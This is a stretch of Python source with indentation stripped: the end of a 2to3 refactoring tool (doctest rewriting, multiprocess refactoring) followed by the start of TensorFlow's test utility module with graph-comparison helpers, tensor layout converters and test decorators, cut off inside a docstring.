then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding, newline='')
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
ops._USE_C_SHAPES = True
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
# pylint: enable=protected-access
return wrapper
def with_c_shapes(cls):
"""Adds methods that call original methods but with C API shapes enabled.
Note this enables C shapes in new methods after running the test class's
setup method.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If C shapes are already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C shapes by default
# without breaking these tests.
if ops._USE_C_SHAPES:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCShapes", enable_c_shapes(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).")
% (collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" % (
new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
if context.executing_eagerly():
f(self, **kwargs)
ops.reset_default_graph()
else:
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.get_default_context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format(
"".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_test_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_tests_in_graph_and_eager_modes`?")
def decorated(self, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/cpu:0"):
f(self, **kwargs)
else:
f(self, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
with context.eager_mode():
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
run_eagerly(self, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
